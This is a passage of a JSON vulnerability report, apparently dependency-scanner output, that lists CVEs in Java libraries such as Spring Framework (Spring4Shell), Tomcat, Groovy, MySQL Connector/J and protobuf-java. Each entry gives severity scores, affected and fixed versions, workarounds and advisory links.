List","url":"http://www.openwall.com/lists/oss-security/2023/10/10/10"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread/2pv8yz1pyp088tsxfb7ogltk9msk0jdp"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2023/10/msg00020.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-45648"},{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-45648"},{"summary":"NetApp Advisory ntap-20231103-0007","url":"https://security.netapp.com/advisory/ntap-20231103-0007"},{"summary":"Debian Advisory dsa-5521","url":"https://www.debian.org/security/2023/dsa-5521"},{"summary":"Debian Advisory dsa-5522","url":"https://www.debian.org/security/2023/dsa-5522"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":5.3,"baseSeverity":"MEDIUM","confidentialityImpact":"NONE","environmentalScore":5.3,"environmentalSeverity":"MEDIUM","integrityImpact":"LOW","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"LOW","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":5.3,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N","version":"3.1"},"products":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.5.0|<8.5.94"]}],"title":"CVE-2023-45648/pkg:maven/org.apache.tomcat.embed/tomcat-embed-core@8.5.11?type=jar"},{"acknowledgements":[{"organization":"Vmware","urls":["https://tanzu.vmware.com/security/cve-2022-22965"]}],"cve":"CVE-2022-22965","cwe":{"id":"74","name":"Improper Neutralization of Special Elements in Output Used by a Downstream Component"},"discovery_date":"2022-03-31T18:30:50","ids":[{"system_name":"CVE Record","text":"CVE-2022-22965"},{"system_name":"Sonicwall Advisory","text":"SNWLID-2022-0005"},{"system_name":"Cisco Advisory","text":"cisco-sa-java-spring-rce-Zx9GUc67"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Vmware Advisory","text":"cve-2022-22965"},{"system_name":"Siemens Advisory","text":"ssa-254054"}],"notes":[{"audience":"developers","category":"other","text":"Improper Control of Generation of Code","title":"Additional CWE: 94"},{"category":"description","details":"Vulnerability Description","text":"Remote Code Execution in Spring Framework"},{"category":"details","details":"Vulnerability Details","text":"# Remote Code Execution in Spring Framework Spring Framework prior to versions 5.2.20 and 5.3.18 contains a remote code execution vulnerability known as `Spring4Shell`.   ## Impact  A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it.  These are the prerequisites for the exploit: - JDK 9 or higher - Apache Tomcat as the Servlet container - Packaged as WAR - `spring-webmvc` or `spring-webflux` dependency  ## Patches  - Spring Framework [5.3.18](https://github.com/spring-projects/spring-framework/releases/tag/v5.3.18) and [5.2.20](https://github.com/spring-projects/spring-framework/releases/tag/v5.2.20.RELEASE) - Spring Boot [2.6.6](https://github.com/spring-projects/spring-boot/releases/tag/v2.6.6) and [2.5.12](https://github.com/spring-projects/spring-boot/releases/tag/v2.5.12)  ## Workarounds  For those who are unable to upgrade, leaked reports recommend setting `disallowedFields` on `WebDataBinder` through an `@ControllerAdvice`. This works generally, but as a centrally applied workaround fix, may leave some loopholes, in particular if a controller sets `disallowedFields` locally through its own `@InitBinder` method, which overrides the global setting.  To apply the workaround in a more fail-safe way, applications could extend `RequestMappingHandlerAdapter` to update the `WebDataBinder` at the end after all other initialization. In order to do that, a Spring Boot application can declare a `WebMvcRegistrations` bean (Spring MVC) or a `WebFluxRegistrations` bean (Spring WebFlux)."}],"product_status":{"known_affected":["org.springframework/spring-webmvc@vers:maven/>=1.0|<=5.2.9.RELEASE"]},"references":[{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/166713/Spring4Shell-Code-Execution.html"},{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/167011/Spring4Shell-Spring-Framework-Class-Property-Remote-Code-Execution.html"},{"summary":"Siemens Advisory ssa-254054","url":"https://cert-portal.siemens.com/productcert/pdf/ssa-254054.pdf"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-22965"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-22965"},{"summary":"Sonicwall Advisory SNWLID-2022-0005","url":"https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0005"},{"summary":"Vmware Advisory cve-2022-22965","url":"https://tanzu.vmware.com/security/cve-2022-22965"},{"summary":"Cisco Advisory cisco-sa-java-spring-rce-Zx9GUc67","url":"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-java-spring-rce-Zx9GUc67"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.8,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.8,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.8,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["org.springframework/spring-webmvc@vers:maven/>=1.0|<=5.2.9.RELEASE"]}],"title":"CVE-2022-22965/pkg:maven/org.springframework/spring-webmvc@4.3.6.RELEASE?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-17521"]}],"cve":"CVE-2020-17521","cwe":{"id":"379","name":"Creation of Temporary File in Directory with Insecure Permissions"},"discovery_date":"2020-12-09T19:03:03","ids":[{"system_name":"CVE Record","text":"CVE-2020-17521"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20201218-0006"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Information Disclosure in Apache Groovy"},{"category":"details","details":"Vulnerability Details","text":"# Information Disclosure in Apache Groovy Apache Groovy provides extension methods to aid with creating temporary directories. Prior to this fix, Groovy's implementation of those extension methods was using a now superseded Java JDK method call that is potentially not secure on some operating systems in some contexts. Users not using the extension methods mentioned in the advisory are not affected, but may wish to read the advisory for further details. Versions Affected: 2.0 to 2.4.20, 2.5.0 to 2.5.13, 3.0.0 to 3.0.6, and 4.0.0-alpha-1. Fixed in versions 2.4.21, 2.5.14, 3.0.7, 4.0.0-alpha-2."}],"product_status":{"known_affected":["org.codehaus.groovy/groovy@vers:maven/>=2.0.0|<2.4.21"],"known_not_affected":["org.codehaus.groovy/groovy@2.4.21"]},"references":[{"summary":"Cve 2020","url":"https://groovy-lang.org/security.html#CVE-2020-17521"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r4b2f13c302eec98838ff7475253091fb9b75bc1038016ba00ebf6c08@%3Cdev.atlas.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/ra9dab34bf8625511f23692ad0fcee2725f782e9aad6c5cdff6cf4465@%3Cnotifications.groovy.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rea63a4666ba245d2892471307772a2d8ce0f0741f341d6576625c1b3@%3Cdev.atlas.apache.org%3E"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-17521"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-17521"},{"summary":"NetApp Advisory ntap-20201218-0006","url":"https://security.netapp.com/advisory/ntap-20201218-0006"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"LOCAL","availabilityImpact":"NONE","baseScore":5.5,"baseSeverity":"MEDIUM","confidentialityImpact":"HIGH","environmentalScore":5.5,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"LOCAL","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":5.5,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N","version":"3.1"},"products":["org.codehaus.groovy/groovy@vers:maven/>=2.0.0|<2.4.21"]}],"title":"CVE-2020-17521/pkg:maven/org.codehaus.groovy/groovy@2.4.7?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-21363"]}],"cve":"CVE-2022-21363","cwe":{"id":"280","name":"Improper Handling of Insufficient Permissions or Privileges "},"discovery_date":"2022-01-20T00:00:48","ids":[{"system_name":"CVE Record","text":"CVE-2022-21363"},{"system_name":"Oracle Advisory","text":"cpujan2022"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Improper Handling of Insufficient Permissions or Privileges in MySQL Connectors Java"},{"category":"details","details":"Vulnerability Details","text":"# Improper Handling of Insufficient Permissions or Privileges in MySQL Connectors Java Vulnerability in the MySQL Connectors product of Oracle MySQL (component: Connector/J). Supported versions that are affected are 8.0.27 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Connectors. Successful attacks of this vulnerability can result in takeover of MySQL Connectors. CVSS 3.1 Base Score 6.6 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)."}],"product_status":{"known_affected":["mysql/mysql-connector-java@vers:maven/>=2.0.14|<=8.0.27"]},"references":[{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-21363"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-21363"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":6.6,"baseSeverity":"MEDIUM","confidentialityImpact":"HIGH","environmentalScore":6.6,"environmentalSeverity":"MEDIUM","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"HIGH","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"HIGH","scope":"UNCHANGED","temporalScore":6.6,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["mysql/mysql-connector-java@vers:maven/>=2.0.14|<=8.0.27"]}],"title":"CVE-2022-21363/pkg:maven/mysql/mysql-connector-java@8.0.12?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-2471"]}],"cve":"CVE-2021-2471","cwe":{"id":"863","name":"Incorrect Authorization"},"discovery_date":"2022-05-24T19:18:20","ids":[{"system_name":"CVE Record","text":"CVE-2021-2471"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpuoct2021"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Incorrect Authorization in MySQL Connector Java"},{"category":"details","details":"Vulnerability Details","text":"# Incorrect Authorization in MySQL Connector Java Vulnerability in the MySQL Connectors product of Oracle MySQL (component: Connector/J). Supported versions that are affected are 8.0.26 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Connectors. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all MySQL Connectors accessible data and unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Connectors. CVSS 3.1 Base Score 5.9 (Confidentiality and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:H)."}],"product_status":{"known_affected":["mysql/mysql-connector-java@vers:maven/>=8.0.0|<8.0.27"],"known_not_affected":["mysql/mysql-connector-java@8.0.27"]},"references":[{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-2471"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-2471"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":5.9,"baseSeverity":"MEDIUM","confidentialityImpact":"HIGH","environmentalScore":5.9,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"HIGH","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"HIGH","scope":"UNCHANGED","temporalScore":5.9,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:H","version":"3.1"},"products":["mysql/mysql-connector-java@vers:maven/>=8.0.0|<8.0.27"]}],"title":"CVE-2021-2471/pkg:maven/mysql/mysql-connector-java@8.0.12?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-22570"]}],"cve":"CVE-2021-22570","cwe":{"id":"476","name":"NULL Pointer Dereference"},"discovery_date":"2022-01-27T00:01:15","ids":[{"system_name":"CVE Record","text":"CVE-2021-22570"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"NetApp Advisory","text":"ntap-20220429-0005"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"NULL Pointer Dereference in Protocol Buffers"},{"category":"details","details":"Vulnerability Details","text":"# NULL Pointer Dereference in Protocol Buffers Nullptr dereference when a null char is present in a proto symbol. The symbol is parsed incorrectly, leading to an unchecked call into the proto file's name during generation of the resulting error message. Since the symbol is incorrectly parsed, the file is nullptr. We recommend upgrading to version 3.15.0 or greater.  ## Related CVE(s) CVE-2021-22570, PYSEC-2022-48"}],"product_status":{"known_affected":["com.google.protobuf/protobuf-java@vers:maven/>=2.0.1|<=3.9.2"],"known_not_affected":["com.google.protobuf/protobuf-java@3.15.0"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2023/04/msg00019.html"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3DVUZPALAQ34TQP6KFNLM4IZS6B32XSA"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5PAGL5M2KGYPN3VEQCRJJE6NA7D5YG5X"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BTRGBRC5KGCA4SK5MUNLPYJRAGXMBIYY"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IFX6KPNOFHYD6L4XES5PCM3QNSKZBOTQ"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KQJB6ZPRLKV6WCMX2PRRRQBFAOXFBK6B"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MRWRAXAFR3JR7XCFWTHC2KALSZKWACCE"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NVTWVQRB5OCCTMKEQFY5MYED3DXDVSLP"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-22570"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-22570"},{"summary":"NetApp Advisory ntap-20220429-0005","url":"https://security.netapp.com/advisory/ntap-20220429-0005"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["com.google.protobuf/protobuf-java@vers:maven/>=2.0.1|<=3.9.2"]}],"title":"CVE-2021-22570/pkg:maven/com.google.protobuf/protobuf-java@2.6.0?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-3510"]}],"cve":"CVE-2022-3510","cwe":{"id":"400","name":"Uncontrolled Resource Consumption"},"discovery_date":"2022-12-12T15:30:33","ids":[{"system_name":"CVE Record","text":"CVE-2022-3510"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Protobuf Java vulnerable to Uncontrolled Resource Consumption"},{"category":"details","details":"Vulnerability Details","text":"# Protobuf Java vulnerable to Uncontrolled Resource Consumption A parsing issue similar to CVE-2022-3171, but with Message-Type Extensions in protobuf-java core and lite versions prior to 3.21.7, 3.20.3, 3.19.6 and 3.16.3 can lead to a denial of service attack. Inputs containing multiple instances of non-repeated embedded messages with repeated or unknown fields causes objects to be converted back-n-forth between mutable and immutable forms, resulting in potentially long garbage collection pauses. We recommend updating to the versions mentioned above."}],"product_status":{"known_affected":["com.google.protobuf/protobuf-java@vers:maven/>=2.0.1|<=3.9.2"],"known_not_affected":["com.google.protobuf/protobuf-java@3.21.7"]},"references":[{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-3510"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-3510"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["com.google.protobuf/protobuf-java@vers:maven/>=2.0.1|<=3.9.2"]}],"title":"CVE-2022-3510/pkg:maven/com.google.protobuf/protobuf-java@2.6.0?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-3509"]}],"cve":"CVE-2022-3509","cwe":{"id":"400","name":"Uncontrolled Resource Consumption"},"discovery_date":"2022-12-12T15:30:33","ids":[{"system_name":"CVE Record","text":"CVE-2022-3509"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Protobuf Java vulnerable to Uncontrolled Resource Consumption"},{"category":"details","details":"Vulnerability Details","text":"# Protobuf Java vulnerable to Uncontrolled Resource Consumption A parsing issue similar to CVE-2022-3171, but with textformat in protobuf-java core and lite versions prior to 3.21.7, 3.20.3, 3.19.6 and 3.16.3 can lead to a denial of service attack. Inputs containing multiple instances of non-repeated embedded messages with repeated or unknown fields causes objects to be converted back-n-forth between mutable and immutable forms, resulting in potentially long garbage collection pauses. We recommend updating to the versions mentioned above."}],"product_status":{"known_affected":["com.google.protobuf/protobuf-java@vers:maven/>=2.0.1|<=3.9.2"],"known_not_affected":["com.google.protobuf/protobuf-java@3.21.7"]},"references":[{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-3509"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-3509"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["com.google.protobuf/protobuf-java@vers:maven/>=2.0.1|<=3.9.2"]}],"title":"CVE-2022-3509/pkg:maven/com.google.protobuf/protobuf-java@2.6.0?type=jar"},{"acknowledgements":[{"organization":"GitHub","urls":["https://github.com/rubysec/ruby-advisory-db/blob/master/gems/google-protobuf/CVE-2022-3171.yml"]}],"cve":"CVE-2022-3171","cwe":{"id":"20","name":"Improper Input Validation"},"discovery_date":"2022-10-04T22:17:15","ids":[{"system_name":"CVE Record","text":"CVE-2022-3171"},{"system_name":"GitHub Advisory","text":"GHSA-h4h5-3hr4-j3g2"},{"system_name":"Gentoo Advisory","text":"glsa-202301-09"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"protobuf-java has a potential Denial of Service issue"},{"category":"details","details":"Vulnerability Details","text":"# protobuf-java has a potential Denial of Service issue ## Summary A potential Denial of Service issue in `protobuf-java` core and lite was discovered in the parsing procedure for binary and text format data. Input streams containing multiple instances of non-repeated [embedded messages](http://developers.google.com/protocol-buffers/docs/encoding#embedded) with repeated or unknown fields causes objects to be converted back-n-forth between mutable and immutable forms, resulting in potentially long garbage collection pauses.   Reporter: [OSS Fuzz](https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=48771)  Affected versions: This issue affects both the Java full and lite Protobuf runtimes, as well as Protobuf for Kotlin and JRuby, which themselves use the Java Protobuf runtime.  ## Severity  [CVE-2022-3171](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3171) Medium - CVSS Score: 5.7 (NOTE: there may be a delay in publication)  ## Remediation and Mitigation  Please update to the latest available versions of the following packages:  protobuf-java (3.21.7, 3.20.3, 3.19.6, 3.16.3) protobuf-javalite (3.21.7, 3.20.3, 3.19.6, 3.16.3) protobuf-kotlin (3.21.7, 3.20.3, 3.19.6, 3.16.3) protobuf-kotlin-lite (3.21.7, 3.20.3, 3.19.6, 3.16.3) google-protobuf [JRuby gem only] (3.21.7, 3.20.3, 3.19.6)"}],"product_status":{"known_affected":["com.google.protobuf/protobuf-java@vers:maven/>=2.0.1|<=3.9.2"]},"references":[{"summary":"GitHub Advisory GHSA-h4h5-3hr4-j3g2","url":"https://github.com/protocolbuffers/protobuf/security/advisories/GHSA-h4h5-3hr4-j3g2"},{"summary":"CVE Record","url":"https://github.com/rubysec/ruby-advisory-db/blob/master/gems/google-protobuf/CVE-2022-3171.yml"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CBAUKJQL6O4TIWYBENORSY5P43TVB4M3"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MPCGUT3T5L6C3IDWUPSUO22QDCGQKTOP"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-3171"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-3171"},{"summary":"Gentoo Advisory glsa-202301-09","url":"https://security.gentoo.org/glsa/202301-09"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"ADJACENT_NETWORK","availabilityImpact":"HIGH","baseScore":5.7,"baseSeverity":"MEDIUM","confidentialityImpact":"NONE","environmentalScore":5.7,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"ADJACENT_NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":5.7,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["com.google.protobuf/protobuf-java@vers:maven/>=2.0.1|<=3.9.2"]}],"title":"CVE-2022-3171/pkg:maven/com.google.protobuf/protobuf-java@2.6.0?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-22569"]}],"cve":"CVE-2021-22569","cwe":{"id":"696","name":"Incorrect Behavior Order"},"discovery_date":"2022-01-07T22:31:44","ids":[{"system_name":"CVE Record","text":"CVE-2021-22569"},{"system_name":"GitHub Advisory","text":"GHSA-wrvw-hg22-4m67"},{"system_name":"Google Advisory","text":"bulletins"},{"system_name":"Oracle Advisory","text":"cpuapr2022"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"A potential Denial of Service issue in protobuf-java"},{"category":"details","details":"Vulnerability Details","text":"# A potential Denial of Service issue in protobuf-java ## Summary  A potential Denial of Service issue in protobuf-java was discovered in the parsing procedure for binary data.  Reporter: [OSS-Fuzz](https://github.com/google/oss-fuzz)  Affected versions: All versions of Java Protobufs (including Kotlin and JRuby) prior to the versions listed below. Protobuf \"javalite\" users (typically Android) are not affected.  ## Severity  [CVE-2021-22569](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22569) **High** - CVSS Score: 7.5, An implementation weakness in how unknown fields are parsed in Java. A small (~800 KB) malicious payload can occupy the parser for several minutes by creating large numbers of short-lived objects that cause frequent, repeated GC pauses.  ## Proof of Concept  For reproduction details, please refer to the oss-fuzz issue that identifies the specific inputs that exercise this parsing weakness.  ## Remediation and Mitigation  Please update to the latest available versions of the following packages:  - protobuf-java (3.16.1, 3.18.2, 3.19.2)  - protobuf-kotlin (3.18.2, 3.19.2) - google-protobuf [JRuby gem only] (3.19.2)"}],"product_status":{"known_affected":["com.google.protobuf/protobuf-java@vers:maven/>=2.0.1|<=3.9.2"]},"references":[{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2022/01/12/4"},{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2022/01/12/7"},{"summary":"Google Advisory bulletins","url":"https://cloud.google.com/support/bulletins#gcp-2022-001"},{"summary":"GitHub Advisory 